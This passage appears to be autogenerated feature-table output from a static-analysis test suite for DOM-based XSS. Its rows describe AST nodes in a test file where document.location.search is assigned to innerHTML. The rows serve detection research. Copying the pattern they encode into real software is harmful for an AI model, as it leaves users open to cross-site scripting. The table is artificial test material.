URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:184:9:184:42 | tainted ... .search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:184:9:184:42 | tainted ... .search | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | +| autogenerated/Xss/DomBasedXss/tst.js:184:9:184:42 | tainted ... .search | enclosingFunctionName | references | +| autogenerated/Xss/DomBasedXss/tst.js:184:9:184:42 | tainted ... .search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:184:19:184:26 | document | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:184:19:184:26 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:184:19:184:26 | document | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | +| autogenerated/Xss/DomBasedXss/tst.js:184:19:184:26 | document | enclosingFunctionName | references | +| autogenerated/Xss/DomBasedXss/tst.js:184:19:184:26 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:184:19:184:35 | document.location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:184:19:184:35 | document.location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:184:19:184:35 | document.location | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | +| autogenerated/Xss/DomBasedXss/tst.js:184:19:184:35 | document.location | enclosingFunctionName | references | +| autogenerated/Xss/DomBasedXss/tst.js:184:19:184:35 | document.location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:184:19:184:42 | documen ... .search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:184:19:184:42 | documen ... .search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:184:19:184:42 | documen ... .search | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | +| autogenerated/Xss/DomBasedXss/tst.js:184:19:184:42 | documen ... .search | enclosingFunctionName | references | +| autogenerated/Xss/DomBasedXss/tst.js:184:19:184:42 | documen ... .search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:184:28:184:35 | location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:184:28:184:35 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:184:28:184:35 | location | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | +| autogenerated/Xss/DomBasedXss/tst.js:184:28:184:35 | location | enclosingFunctionName | references | +| autogenerated/Xss/DomBasedXss/tst.js:184:28:184:35 | location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:184:37:184:42 | search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:184:37:184:42 | search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:184:37:184:42 | search | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | +| autogenerated/Xss/DomBasedXss/tst.js:184:37:184:42 | search | enclosingFunctionName | references | +| autogenerated/Xss/DomBasedXss/tst.js:184:37:184:42 | search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:186:5:186:12 | document | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:186:5:186:12 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:186:5:186:12 | document | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | +| autogenerated/Xss/DomBasedXss/tst.js:186:5:186:12 | document | enclosingFunctionName | references | +| autogenerated/Xss/DomBasedXss/tst.js:186:5:186:12 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:186:5:186:17 | document.body | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:186:5:186:17 | document.body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:186:5:186:17 | document.body | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | +| autogenerated/Xss/DomBasedXss/tst.js:186:5:186:17 | document.body | enclosingFunctionName | references | +| autogenerated/Xss/DomBasedXss/tst.js:186:5:186:17 | document.body | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:186:5:186:27 | documen ... nerHTML | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:186:5:186:27 | documen ... nerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:186:5:186:27 | documen ... nerHTML | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | +| autogenerated/Xss/DomBasedXss/tst.js:186:5:186:27 | documen ... nerHTML | enclosingFunctionName | references | +| autogenerated/Xss/DomBasedXss/tst.js:186:5:186:27 | documen ... nerHTML | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:186:5:186:37 | documen ... tainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:186:5:186:37 | documen ... tainted | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:186:5:186:37 | documen ... tainted | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | +| autogenerated/Xss/DomBasedXss/tst.js:186:5:186:37 | documen ... tainted | enclosingFunctionName | references | +| autogenerated/Xss/DomBasedXss/tst.js:186:5:186:37 | documen ... tainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:186:14:186:17 | body | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:186:14:186:17 | body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:186:14:186:17 | body | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | +| autogenerated/Xss/DomBasedXss/tst.js:186:14:186:17 | body | enclosingFunctionName | references | +| autogenerated/Xss/DomBasedXss/tst.js:186:14:186:17 | body | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:186:19:186:27 | innerHTML | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:186:19:186:27 | innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:186:19:186:27 | innerHTML | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | +| autogenerated/Xss/DomBasedXss/tst.js:186:19:186:27 | innerHTML | enclosingFunctionName | references | +| autogenerated/Xss/DomBasedXss/tst.js:186:19:186:27 | innerHTML | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:186:31:186:37 | tainted | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/tst.js:186:31:186:37 | tainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | | autogenerated/Xss/DomBasedXss/tst.js:186:31:186:37 | tainted | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/tst.js:186:31:186:37 | tainted | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | | autogenerated/Xss/DomBasedXss/tst.js:186:31:186:37 | tainted | enclosingFunctionName | references | | autogenerated/Xss/DomBasedXss/tst.js:186:31:186:37 | tainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:188:5:188:12 | document | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:188:5:188:12 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:188:5:188:12 | document | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | +| autogenerated/Xss/DomBasedXss/tst.js:188:5:188:12 | document | enclosingFunctionName | references | +| autogenerated/Xss/DomBasedXss/tst.js:188:5:188:12 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:188:5:188:26 | documen ... Element | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:188:5:188:26 | documen ... Element | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:188:5:188:26 | documen ... Element | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | +| autogenerated/Xss/DomBasedXss/tst.js:188:5:188:26 | documen ... Element | enclosingFunctionName | references | +| autogenerated/Xss/DomBasedXss/tst.js:188:5:188:26 | documen ... Element | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:188:5:188:28 | documen ... ement() | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:188:5:188:28 | documen ... ement() | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:188:5:188:28 | documen ... ement() | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | +| autogenerated/Xss/DomBasedXss/tst.js:188:5:188:28 | documen ... ement() | enclosingFunctionName | references | +| autogenerated/Xss/DomBasedXss/tst.js:188:5:188:28 | documen ... ement() | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:188:5:188:28 | exceptional return of documen ... ement() | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:188:5:188:28 | exceptional return of documen ... ement() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:188:5:188:28 | exceptional return of documen ... ement() | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | +| autogenerated/Xss/DomBasedXss/tst.js:188:5:188:28 | exceptional return of documen ... ement() | enclosingFunctionName | references | +| autogenerated/Xss/DomBasedXss/tst.js:188:5:188:28 | exceptional return of documen ... ement() | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:188:5:188:38 | documen ... nerHTML | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:188:5:188:38 | documen ... nerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:188:5:188:38 | documen ... nerHTML | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | +| autogenerated/Xss/DomBasedXss/tst.js:188:5:188:38 | documen ... nerHTML | enclosingFunctionName | references | +| autogenerated/Xss/DomBasedXss/tst.js:188:5:188:38 | documen ... nerHTML | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:188:5:188:48 | documen ... tainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:188:5:188:48 | documen ... tainted | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:188:5:188:48 | documen ... tainted | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | +| autogenerated/Xss/DomBasedXss/tst.js:188:5:188:48 | documen ... tainted | enclosingFunctionName | references | +| autogenerated/Xss/DomBasedXss/tst.js:188:5:188:48 | documen ... tainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:188:14:188:26 | createElement | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:188:14:188:26 | createElement | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:188:14:188:26 | createElement | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | +| autogenerated/Xss/DomBasedXss/tst.js:188:14:188:26 | createElement | enclosingFunctionName | references | +| autogenerated/Xss/DomBasedXss/tst.js:188:14:188:26 | createElement | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:188:30:188:38 | innerHTML | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:188:30:188:38 | innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:188:30:188:38 | innerHTML | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | +| autogenerated/Xss/DomBasedXss/tst.js:188:30:188:38 | innerHTML | enclosingFunctionName | references | +| autogenerated/Xss/DomBasedXss/tst.js:188:30:188:38 | innerHTML | fileImports | ansi-to-html | | 